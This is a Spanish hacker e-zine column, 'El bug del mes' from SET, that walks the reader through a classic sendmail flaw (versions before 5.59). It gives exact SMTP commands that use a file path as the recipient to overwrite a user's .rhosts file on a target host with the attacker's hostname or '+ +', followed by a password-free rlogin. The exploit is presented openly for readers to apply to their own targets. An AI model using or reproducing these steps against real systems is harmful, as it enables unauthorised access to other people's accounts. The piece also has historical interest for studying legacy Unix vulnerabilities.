SET 39 Call For Papers

¿Eres un hacker? Si deseas pasar a formar parte de la historia del hacking hispano, colabora con la próxima edición de SET 39 enviándonos un artículo. No esperes más, esta es tu oportunidad de demostrar lo que sabes. Ayúdanos a construir una revista de hackers para hackers. SET Staff

Lee el último número

El bug del mes

      4488

Autor: Dark Raver
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
o 04. EL BUG DEL MES                                                        o
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII


Saludos amigos, aqui esta para serviros y para comentaros el bug de este
mes el Dark Raver. Como no os sonara mi nombre, os dire que soy un fanatico
de los ordenatas y por supuesto del hacking, que me podreis encontrar en 
Axis y que es la primera vez que escribo en esta super publicacion, y no es 
por peloteo :-)

Me han dejado libertad, para elegir el bug de este mes, pero me han dicho
que no me porte mal }:-) Es una pena, pero habra que aguantarse. Por 
eso he decidido continuar con lo que hizo Red en el numero anterior y
os voy a explicar otro bug clasico del sendmail.

Este bug es un poco mas moderno, que el que explico Red, y a lo mejor todavia
funciona en algun sitio, pero no os hagais ilusiones.


Sistemas: Unix's en general 
Versiones: Sendmail, versiones anteriores a la 5.59
Descripcion: Bug del sendmail

Con este bug, los usuarios externos pueden sobre-escribir cualquier archivo,
que no tenga nivel de root.

Ejemplo: (No voy a poner ejemplos de sistemas operativos concretos. Intentare
esplicarme lo mas generalmente posible, y luego vosotros tendreis que 
aplicarlo a vustro sistema en concreto.)

Hacemos un telnet a victima.com al puerto 25

rcpt to: /home/pepe/.rhosts   -->   Nombre (y situacion) del fichero a 
                              escribir. En este caso vamos a sobre-escribir
                              el rhosts del usuario llamado pepe.

mail from: pepe

data

"Aqui pon lo que quieras, un comentario para el root por ejemplo :-)"

.   -->   Normalmente te dara un mensaje de error, despues de poner
          el punto.

rcpt to: /home/pepe/.rhosts   -->   Esto es muy importante, hay que hacerlo
                                    2 veces.
mail from: pepe

data   -->   Ahora en este segundo intento si que podras escribir en el 
             fichero.

mi.ordenador.com   -->   Esto es lo que se escribira en el archivo. Tambien se
                         podria poner ' + + ' o algo similar.

.   -->   Si no da mensaje de error es que ha funcionado.

quit


Despues hacemos un rlogin a victima.com como si fuesemos pepe, y como
el nombre de nuestro ordenador, aparece en su .rhosts (remote hosts) 
entraremos sin problemas, ya que no nos pedira el pass.
         
Para comprender este texto, es necesario, tener un nivel medio en el manejo
de sistemas unix. Si no has comprendido algo, mirate un manual sobre unix,
o instalate el linux en tu pc y practica un poco. Seguro que si lo haces
este fichero te parecera cosa de ni€os.

                                                        Dark Raver